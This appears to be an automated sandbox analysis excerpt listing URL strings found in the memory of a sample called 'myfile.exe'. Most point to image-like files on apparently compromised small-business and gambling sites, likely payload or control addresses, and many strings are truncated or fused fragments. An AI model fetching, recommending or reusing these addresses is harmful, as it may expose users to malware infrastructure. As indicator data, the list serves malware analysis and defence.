Source: myfile.exe, 00000000.00000003.2839682725.0000000001051000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://davedavisphotos.com/g
Source: myfile.exe, 00000000.00000003.2839682725.0000000001051000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://davedavisphotos.com/gifw
Source: myfile.exe, 00000000.00000003.2839682725.0000000001051000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://davedavisphotos.com/h
Source: myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://davedavisphotos.com:443/content/tmp/xp.jpglexced.comwww.lexced.com
Source: myfile.exe, 00000000.00000003.2354497266.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354771647.0000000001059000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365282654.0000000001058000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://enactusnhlstenden.com/
Source: myfile.exe, 00000000.00000003.2354497266.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382703447.0000000001058000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354771647.0000000001059000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365282654.0000000001058000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://enactusnhlstenden.com/wp-content/assets/bfrdpc.gif
Source: myfile.exe, 00000000.00000003.2354497266.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382703447.0000000001058000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354771647.0000000001059000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365282654.0000000001058000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://enactusnhlstenden.com/wp-content/assets/bfrdpc.gifS
Source: myfile.exe, 00000000.00000003.2468286003.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.bunny.net/css?family=Montserrat:400
Source: myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css2?family=DM
Source: myfile.exe, 00000000.00000003.2589306558.000000000439D000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css2?family=Rubik:wght
Source: myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.gstatic.com
Source: myfile.exe, 00000000.00000003.2839682725.0000000001051000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://georgemuncey.com/admin/gam
Source: myfile.exe, 00000000.00000003.2503575660.0000000005B39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/sindresorhus/modern-normalize
Source: myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gmpg.org/xfn/11
Source: myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://holocine.de/wp-json/
Source: myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://holocine.de:443/data/assets/hxdtlt.gifgicdxmun.gifesource0
Source: myfile.exe, 00000000.00000002.2895379820.0000000005B1C000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001039000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hostaletdelsindians.es/news/temp/wpuatzictpgv.jpg
Source: myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hostaletdelsindians.es:443/news/temp/wpuatzictpgv.jpggx.gifage
Source: myfile.exe, 00000000.00000003.2839610274.0000000005B31000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839035490.0000000005B33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ikadomus.com
Source: myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ikadomus.com/news/tmp/zrxchmwcslab.gif
Source: myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ikadomus.com:443/news/tmp/zrxchmwcslab.gifiathwnvkwf.gife0
Source: myfile.exe, 00000000.00000003.2589424950.0000000005B61000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589328177.0000000002C6A000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589450602.0000000005B15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://images.squarespace-cdn.com
Source: myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://images.squarespace-cdn.com/content/v1/5ad68080a9e028226c1155ed/76390403-0988-4064-9bd4-1d8ec
Source: myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://innervisions-id.com/
Source: myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://innervisions-id.com//
Source: myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://innervisions-id.com/h
Source: myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://innervisions-id.com/png
Source: myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://innervisions-id.com/wp-content/images/kpgkqb.jpg
Source: myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://innervisions-id.com/wp-content/images/kpgkqb.jpg/g
Source: myfile.exe, 00000000.00000002.2895361971.000000000439F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://innervisions-id.com/wp-content/images/kpgkqb.jpgq
Source: myfile.exe, 00000000.00000002.2895379820.0000000005B1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://innervisions-id.com/wp-content/images/kpgkqb.jpgr
Source: myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://innervisions-id.com/wp-content/images/kpgkqb.jpgw
Source: myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://innervisions-id.com:443/wp-content/images/kpgkqb.jpg.gife0
Source: myfile.exe, 00000000.00000003.2468286003.0000000001051000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://karnesstanleyhvac.com/
Source: myfile.exe, 00000000.00000003.2468286003.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000001051000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://karnesstanleyhvac.com/(
Source: myfile.exe, 00000000.00000003.2468286003.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000001071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://karnesstanleyhvac.com/content/images/gv.png
Source: myfile.exe, 00000000.00000003.2468286003.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://karnesstanleyhvac.com/content/images/gv.png#)
Source: myfile.exe, 00000000.00000003.2468286003.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://karnesstanleyhvac.com/content/images/gv.pngDK
Source: myfile.exe, 00000000.00000003.2468286003.0000000001051000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://karnesstanleyhvac.com/content/images/gv.pngLocationETagAuthentication-InfoAgeAccept-RangesLa
Source: myfile.exe, 00000000.00000003.2468286003.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://karnesstanleyhvac.com/content/images/gv.pngcom
Source: myfile.exe, 00000000.00000003.2468286003.0000000001071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://karnesstanleyhvac.com/content/images/gv.pngk
Source: myfile.exe, 00000000.00000003.2468286003.0000000001071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://karnesstanleyhvac.com/content/images/gv.pngpng
Source: myfile.exe, 00000000.00000003.2468286003.0000000001051000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://karnesstanleyhvac.com/w
Source: myfile.exe, 00000000.00000003.2468286003.0000000001071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://karnesstanleyhvac.com/wp-json/
Source: myfile.exe, 00000000.00000003.2468286003.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://karnesstanleyhvac.com:443/content/images/gv.png
Source: myfile.exe, 00000000.00000003.2354497266.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354771647.0000000001059000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lashandbrowenvy.com/
Source: myfile.exe, 00000000.00000003.2354497266.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354771647.0000000001059000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365282654.0000000001058000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lashandbrowenvy.com/2
Source: myfile.exe, 00000000.00000003.2354497266.0000000001071000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354497266.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354771647.0000000001071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lashandbrowenvy.com/admin/images/ff.gif
Source: myfile.exe, 00000000.00000003.2354497266.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lashandbrowenvy.com/admin/images/ff.gifql
Source: myfile.exe, 00000000.00000003.2468286003.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354497266.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382703447.0000000001058000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354771647.0000000001059000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365282654.0000000001058000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lashandbrowenvy.com/m/
Source: myfile.exe, 00000000.00000003.2354497266.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382703447.0000000001058000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354771647.0000000001059000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365282654.0000000001058000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lashandbrowenvy.com/m/(
Source: myfile.exe, 00000000.00000003.2354497266.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354771647.0000000001059000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365282654.0000000001058000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lashandbrowenvy.com/w
Source: myfile.exe, 00000000.00000003.2354497266.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lashandbrowenvy.com/wp-json/
Source: myfile.exe, 00000000.00000003.2382483791.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354497266.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lashandbrowenvy.com:443/admin/images/ff.gifc/lgul.jpg4692b
Source: myfile.exe, 00000000.00000003.2503875458.0000000001039000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lexced.com/
Source: myfile.exe, 00000000.00000003.2503875458.0000000001039000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lexced.com/5
Source: myfile.exe, 00000000.00000003.2503875458.0000000001039000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lexced.com/O
Source: myfile.exe, 00000000.00000003.2503875458.0000000001039000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lexced.com/static/tmp/vd.gif
Source: myfile.exe, 00000000.00000003.2600172847.0000000001071000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2556494998.0000000001071000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503875458.0000000001071000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589691593.0000000001071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lexced.com/static/tmp/vd.gif#
Source: myfile.exe, 00000000.00000003.2503875458.0000000001039000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lexced.com/static/tmp/vd.gif9
Source: myfile.exe, 00000000.00000003.2503875458.0000000001039000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lexced.com/static/tmp/vd.gifw
Source: myfile.exe, 00000000.00000003.2503677440.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lexced.com:443/static/tmp/vd.gif3//iybw.jpg.pngResource0
Source: myfile.exe, 00000000.00000003.2468286003.0000000001039000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://m2graph.fr/S
Source: myfile.exe, 00000000.00000003.2468286003.0000000001039000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://m2graph.fr/m
Source: myfile.exe, 00000000.00000003.2468286003.0000000001039000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://m2graph.fr/q
Source: myfile.exe, 00000000.00000003.2468286003.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://m2graph.fr:443/news/pics/sovuwxryinfm.pngfc/lgul.jpg4692b
Source: myfile.exe, 00000000.00000003.2839682725.0000000001071000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001071000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://maxcube24.com.ua/4
Source: myfile.exe, 00000000.00000003.2839682725.0000000001071000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001071000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://maxcube24.com.ua/wp-content/graphic/wrza.jpg
Source: myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://maxcube24.com.ua:443/wp-content/graphic/wrza.jpg.jpgource0
Source: myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mieleshopping.it:443/wp-content/game/doiathwnvkwf.gifa4692b
Source: myfile.exe, 00000000.00000003.2556494998.0000000001051000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mursall.de/admin/graphic/qhok.jpg
Source: myfile.exe, 00000000.00000003.2600006397.0000000005B1B000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mursall.de/comments/feed/
Source: myfile.exe, 00000000.00000003.2600006397.0000000005B1B000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mursall.de/feed/
Source: myfile.exe, 00000000.00000003.2600006397.0000000005B1B000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mursall.de/wp-includes/css/dist/block-library/style.min.css
Source: myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mursall.de/wp-json/
Source: myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nbva.co.uk/wp-json/
Source: myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://oscommunity.de/wp-content/pictures/vuvqcuzorejq.png
Source: myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://oscommunity.de:443/wp-content/pictures/vuvqcuzorejq.pngx.gifage
Source: myfile.exe, 00000000.00000003.2382483791.0000000001071000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pansionatblago.ru/
Source: myfile.exe, 00000000.00000003.2382483791.0000000001071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pansionatblago.ru/n
Source: myfile.exe, 00000000.00000003.2382483791.0000000001071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pansionatblago.ru/t$~
Source: myfile.exe, 00000000.00000003.2382483791.0000000001071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pansionatblago.ru/v
Source: myfile.exe, 00000000.00000003.2382703447.0000000001058000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001051000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pansionatblago.ru/wp-content/assets/umjrglicgx.jpg
Source: myfile.exe, 00000000.00000003.2382483791.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pansionatblago.ru/wp-content/assets/umjrglicgx.jpga
Source: myfile.exe, 00000000.00000003.2382703447.0000000001058000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001051000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pansionatblago.ru/wp-content/assets/umjrglicgx.jpgw
Source: myfile.exe, 00000000.00000003.2382483791.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pansionatblago.ru:443/wp-content/assets/umjrglicgx.jpgurce0
Source: myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://parksideseniorliving.net/
Source: myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://parksideseniorliving.net/#/schema/logo/image/
Source: myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://parksideseniorliving.net/#organization
Source: myfile.exe, 00000000.00000003.2354497266.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://parksideseniorliving.net/#website
Source: myfile.exe, 00000000.00000003.2354497266.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://parksideseniorliving.net/?s=
Source: myfile.exe, 00000000.00000003.2382483791.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354497266.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://parksideseniorliving.net/admin/temp/eghuey.png
Source: myfile.exe, 00000000.00000003.2354497266.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://parksideseniorliving.net/comments/feed/
Source: myfile.exe, 00000000.00000003.2354497266.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://parksideseniorliving.net/feed/
Source: myfile.exe, 00000000.00000003.2365373242.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503875458.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354497266.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://parksideseniorliving.net/l
Source: myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://parksideseniorliving.net/wp-content/uploads/2019/08/Parkside-Logo.png
Source: myfile.exe, 00000000.00000003.2354706141.0000000001090000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://parksideseniorliving.net/wp-json/
Source: myfile.exe, 00000000.00000003.2354497266.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://parksideseniorliving.net:443/admin/temp/eghuey.pngResource0
Source: myfile.exe, 00000000.00000003.2589381515.0000000002C66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://princebet88.net/
Source: myfile.exe, 00000000.00000003.2589450602.0000000005B60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://princebet88.site/
Source: myfile.exe, 00000000.00000003.2600172847.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://princebet88.site//
Source: myfile.exe, 00000000.00000003.2589691593.000000000109D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://princebet88.site/LocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon
Source: myfile.exe, 00000000.00000002.2894563140.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589424950.0000000005B61000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589381515.0000000002C66000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589450602.0000000005B15000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589450602.0000000005B60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://princebet88.site/amp/
Source: myfile.exe, 00000000.00000003.2589450602.0000000005B15000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589450602.0000000005B60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://princebet88.site/assets/images/banner-princebet88.webp
Source: myfile.exe, 00000000.00000002.2894563140.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589424950.0000000005B61000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589381515.0000000002C66000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589450602.0000000005B15000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589450602.0000000005B60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://princebet88.site/assets/images/fav-princebet88.webp
Source: myfile.exe, 00000000.00000003.2589424950.0000000005B61000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589328177.0000000002C6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://princebet88.site/assets/images/logo-princebet88.webp
Source: myfile.exe, 00000000.00000003.2600172847.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://princebet88.site:443/data/game/mfkyhvlfokmitv.pngifkynx.gifage
Source: myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rsidesigns.com/
Source: myfile.exe, 00000000.00000003.2365373242.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365282654.0000000001071000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001071000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365282654.0000000001058000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rsidesigns.com/wp-content/assets/iybw.jpg
